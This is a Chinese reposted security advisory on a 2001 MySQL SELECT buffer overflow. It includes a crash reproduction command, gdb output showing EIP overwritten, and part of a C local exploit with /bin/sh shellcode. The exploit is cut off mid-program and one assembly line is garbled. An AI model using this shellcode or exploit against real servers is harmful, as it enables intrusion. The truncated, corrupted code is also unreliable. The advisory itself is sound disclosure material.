mysql溢出漏洞,Mysql 远程缓冲区溢出漏洞

c4468b3f4df77e96b0a416fa2a870fba.png

Mysql 远程缓冲区溢出漏洞

发布日期:2001-01-27

更新日期:2001-01-27

受影响系统:T.C.X DataKonsult MySQL 3.23.30

T.C.X DataKonsult MySQL 3.23.29

T.C.X DataKonsult MySQL 3.23.28

T.C.X DataKonsult MySQL 3.23.27

T.C.X DataKonsult MySQL 3.23.26

T.C.X DataKonsult MySQL 3.23.25

T.C.X DataKonsult MySQL 3.23.24

T.C.X DataKonsult MySQL 3.23.23不受影响系统:T.C.X DataKonsult MySQL 3.23.31描述:BUGTRAQ ID: 2262

CVE(CAN) ID: CAN-2001-1274

MySQL是一个开放源代码的自由数据库软件。3.23.31以前的版本都存在一个缓冲区

溢出漏洞。

通过使用一个特别长的字符串作为SELECT语句的参数,可能导致mysqld发生缓冲区

溢出。堆栈中的数据可能被覆盖或修改,攻击者可能远程获取mysqld的运行权限或

使mysqld数据库崩溃。

测试方法:警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Joao Gouveia提供了下列测试步骤:

> On one terminal:

>

> spike:/var/mysql # /sbin/init.d/mysql start

> Starting service MySQL.

> Starting mysqld daemon with databases from /var/mysql

> done

> spike:/var/mysql #

>

>

> On the other terminal:

>

> jroberto@spike:~ > mysql -p -e 'select a.'`perl -e'printf("A"x130)'`'.b'

> Enter password:

> (hanged..^C)

>

>

> On the first terminal i got:

>

> spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault

> nohup

> $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin

> g "$@" >>$err_log 2>&1>

> Number of processes running now: 0

> mysqld restarted on Fri Jan 12 07:10:54 WET 2001

> mysqld daemon ended

>

>

> gdb shows the following:

>

> (gdb) run

> Starting program: /usr/sbin/mysqld

> [New Thread 16897 (manager thread)]

> [New Thread 16891 (initial thread)]

> [New Thread 16898]

> /usr/sbin/mysqld: ready for connections

> [New Thread 16916]

> [Switching to Thread 16916]

>

> Program received signal SIGSEGV, Segmentation fault.

> 0x41414141 in ?? ()

> (gdb) info all-registers

> eax 0x1 1

> ecx 0x68 104

> edx 0x8166947 135686471

> ebx 0x41414141 1094795585

> esp 0xbf5ff408 0xbf5ff408

> ebp 0x41414141 0x41414141

> esi 0x41414141 1094795585

> edi 0x0 0

> eip 0x41414141 0x41414141

> eflags 0x10246 66118

> cs 0x23 35

> ss 0x2b 43

> ds 0x2b 43

> es 0x2b 43

> fs 0x0 0

> gs 0x0 0

> (gdb)

>

Luis Miguel Silva [aka wC](lms@ispgaya.pt)提供了一个测试程序:

#include

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 130

#define NOP 0x90

// Our EVIL code...

char shellcode[] =

"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"

"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"

"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned

long get_sp(void) {

__asm__("movl %esp,陎");

}

// Where it all happens...

main(int argc, char *argv[])

{

char *buffer, *ptr, tmp[1500];

long *addr_ptr, addr;

int i,bsize=DEFAULT_BUFFER_SIZE,offset=DEFAULT_OFFSET;

printf("\nMySQL [al versions < 3.23.31] Local Exploit by

lms@ispgaya.pt\n\n");

if (argc==2) offset=atoi(argv[1]);

else

printf("Happy toughts: Did you know you can pass a offset as argv[1]? :]\n");

printf("Trying to allocate memory for buffer (%d bytes)...",bsize);

if (!(buffer = malloc(bsize))) {

printf("ERROR!\n");

printf("Couldn't allocate memory...\n");

printf("Exiting...\n");

exit(0);

}

printf("SUCCESS!\n");

addr=get_sp()-offset;

printf("Using address : 0x%x\n", addr);

printf("Offset : %d\n",offset);

标签:

版权申明:本站文章部分自网络,如有侵权,请联系:west999com@outlook.com

特别注意:本站所有转载文章言论不代表本站观点,本站所提供的摄影照片,插画,设计作品,如需使用,请与原作者联系,版权归原作者所有

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值